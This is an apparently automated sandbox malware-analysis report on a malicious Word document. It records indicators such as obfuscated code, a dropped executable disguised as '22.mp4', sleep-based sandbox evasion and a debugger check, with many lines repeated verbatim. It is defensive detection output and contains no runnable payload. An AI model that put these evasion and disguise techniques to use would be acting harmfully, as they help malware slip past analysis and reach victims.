Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: rundll32.exe, 00000003.00000002.524313023.000000006F86A000.00000002.00020000.sdmp, 1118_8732615.doc

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 3_2_6F833580
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83F7A0 push FFFFFFFFh; ret 3_2_6F83F7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83BF7F push ecx; ret 3_2_6F83BF88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F84053F push ecx; ret 3_2_6F840540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840CF3 push esp; ret 3_2_6F840D28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840C0C push esi; ret 3_2_6F840C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CBA4 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83DBFB push eax; iretd 3_2_6F83DC08
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EB0F push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840B08 pushad ; iretd 3_2_6F840B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CB68 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EAA7 push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83D2E7 push esp; ret 3_2_6F83D2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8602F4 push ecx; ret 3_2_6F860306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83F7A0 push FFFFFFFFh; ret 3_2_6F83F7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83BF7F push ecx; ret 3_2_6F83BF88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F84053F push ecx; ret 3_2_6F840540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840CF3 push esp; ret 3_2_6F840D28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840C0C push esi; ret 3_2_6F840C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CBA4 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83DBFB push eax; iretd 3_2_6F83DC08
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EB0F push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F840B08 pushad ; iretd 3_2_6F840B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83CB68 push edi; ret 3_2_6F83CBFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83EAA7 push ebx; ret 3_2_6F83EB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F83D2E7 push esp; ret 3_2_6F83D2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8602F4 push ecx; ret 3_2_6F860306

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 1020 Jump to behavior
Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 1020 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_6F833400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F833400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_6F833400
Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F863E04 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6F863E04
